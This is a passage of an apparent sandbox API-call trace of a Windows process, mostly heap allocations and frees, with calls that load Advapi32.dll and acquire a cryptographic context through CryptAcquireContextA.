hHeap=0x1780000) returned 1 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.700] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.700] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.701] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0100.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0100.701] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0100.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.702] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0100.702] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.702] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0100.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0100.703] PeekMessageW (in: lpMsg=0x144e584, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e584) returned 0 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0100.706] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0100.706] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0100.706] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a5250) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0100.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.709] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0100.709] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.746] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: 